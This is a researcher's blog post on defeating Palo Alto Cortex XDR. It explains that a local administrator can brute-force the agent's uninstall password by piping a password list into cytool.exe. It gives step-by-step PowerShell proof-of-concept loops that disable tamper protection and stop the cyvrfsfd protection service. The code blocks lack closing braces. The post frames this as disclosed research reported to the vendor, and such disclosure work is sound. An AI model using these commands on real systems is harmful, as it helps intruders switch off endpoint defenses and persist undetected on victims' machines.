combined attacks against XDR


Despite the fact, XDR products play bulletproof against newly cyber by newly updated built-in defensive techniques and procedures, there are small holes in the development face of such products which could let intruders get used to it to gain an ability to disable or suspend or even use it as a way of persistent.

in this article, I am going to highlight some of these ways that could be used to combine it together to break the protection level or even uninstall the whole solution.

during one of the engagements I was having, it was challenging for me to bypass the latest update from Cortex XDR which I would say successfully prevented the majority of these combined attacks, and it becomes a blocked road for my goal.

at that time I was thinking, what’s the common possibility if I got an administrative command line or access level to disable or even uninstall Cortex. and from there I can easily continue to load my OffSec tools and achieve the goal of engagement.

unfortunately, Cortex enables by default tampering prevention procedures to stop any possible way to uninstall the agent without an uninstallation protected password or you should do that from the management console which I don’t have access to.

by reading the documentation of uninstalling procedures I have figured out that a tool called cytool.exe accepts the entered password in the format of raw CLI input type, which means it is possible to just echo the password in the cytool.exe to check if it’s valid or not.

I am a local administrator!

I still believe if I am an administrator, I can find a way to disable that but it needs to abuse some of this miscoded stuff to combine it like a puzzle and totally divert that agent Cytool CLI.

Cytool is a command-line interface (CLI) that is integrated into Traps and enables you to query and manage both basic and advanced functions of Traps. Any changes you make using Cytool are active until Traps receives the next heartbeat communication from the Traps management service.

as we all know many organizations are using weak passwords or easily guessed for their protected agent’s protection starting from this idea we could initiate brute force attacks to check for valid Cytool passwords, depending on the weakness part of no limitation has been enforced to how many time allowed to supply an invalid password.

below is a working PoC which allows such an attack and successfully disables tampering and protection.

  1. Navigate to c:\programe files\palo alto networks \traps
  2. Initiate the PowerShell
  3. Execute the following PoC supplied with a list of your password list
$pwd_list = gc c:\users\lawre\passwords.txt
foreach ( $obj in $pwd_list) {
write-output $obj | .\cytool.exe protect disable

after a couple of minutes, I was able to disable the tampering protection for all services, processes, registry, which easily can allow me to uninstall the agent or modify some registry settings to completely disable or suspend the node.

Disable the Cortex XDR

yup, there is another way to do that, there is a possible way to stop service cyvrfsfd using cytool.exe also. (.\cytool.exe runtime stop cyvrfsfd), so we can initiate the same brute force attack vector to successfully disable the whole protection service.

$pwd_list = gc c:\users\lawre\passwords.txt
foreach ( $obj in $pwd_list) {
write-output $obj | .\cytool.exe runtime stop cyvrfsfd


the research case has been tested on the latest version of Cortex XDR, the issue has been reported to the Cortex XDR psirt team as they were working on a fix but there is no an official timeline or continuous follow-up by their side after around 3 months of reporting.

Please follow and like us:

Leave a Comment